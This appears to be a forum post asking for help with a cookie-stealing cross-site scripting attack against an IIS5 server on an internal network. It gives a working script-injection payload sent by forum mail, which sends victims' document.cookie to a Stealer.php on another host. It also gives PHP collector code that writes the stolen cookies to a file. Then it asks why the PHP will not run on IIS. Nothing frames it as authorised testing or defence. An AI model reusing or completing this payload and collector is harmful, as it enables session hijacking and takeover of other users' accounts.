Am playing with cookie stealing (XSS) against IIS5 server on internal network.
Injecting this code in forum mail:
hxxp://10.xx.xx.xx/login.asp?search=<script>location.href = 'http://10.xx.xx.xx/Stealer.php?cookie='+document.cookie;</script>
When I logout and relogin as new user, I get the PHP popping up, asking do I want to open with notepad.
Can you load PHP files on IIS , Everything on server is ASP ...
BELOW IS SCRIPT
$cookie = $HTTP_GET_VARS["cookie"];
$steal = fopen("cookiefile.txt", "a");
fwrite($steal, $cookie ."\\n");